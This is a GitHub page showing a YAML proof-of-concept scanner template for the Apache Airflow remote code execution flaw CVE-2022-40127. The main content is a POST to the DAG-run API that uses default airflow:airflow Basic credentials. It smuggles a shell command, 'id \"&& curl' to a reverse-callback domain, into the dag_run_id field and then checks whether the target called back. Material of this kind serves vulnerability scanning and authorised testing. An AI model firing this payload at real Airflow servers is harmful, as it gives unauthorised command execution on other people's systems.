-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathapache-airflow-cve-2022-40127.yml
33 lines (33 loc) · 1.41 KB
/
apache-airflow-cve-2022-40127.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
name: poc-yaml-apache-airflow-cve-2022-40127
manual: true
transport: http
set:
reverse: newReverse()
reverseDomain: reverse.domain
time: timeConvert(int(now()), "2006-01-02T3:4:05")
rules:
# 1.x版本airflow 执行耗时接近两分钟,不适合执行命令验证,需要手工测试
r0:
request:
cache: true
method: GET
path: /admin/dagrun/
expression: response.status == 200 && response.body.bcontains(b"example_bash_operator")
# 2.x 版本使用API接口直接测试,不通主机系统时间可能不一样,导致反联平台可能无回显
r1:
request:
cache: true
method: POST
path: /api/v1/dags/example_bash_operator/dagRuns
headers:
Content-Type: application/json
Authorization: Basic YWlyZmxvdzphaXJmbG93
body: '{ "conf": { "dag_run": "api2" }, "dag_run_id": "id \"&& curl {{reverseDomain}}", "logical_date": "{{time}}.920Z"}'
expression: >-
response.status == 200 && reverse.wait(5) || response.status == 200 && response.body.bcontains(b"\"dag_id\": \"example_bash_operator\"") && response.body.bcontains(b"\"state\": \"queued\"")
expression: r0() || r1()
detail:
author: Rainmaker(https://github.com/SevenC-base)
links:
- https://mrxn.net/jswz/701.html
description: apache-airflow-cve-2022-40127 RCE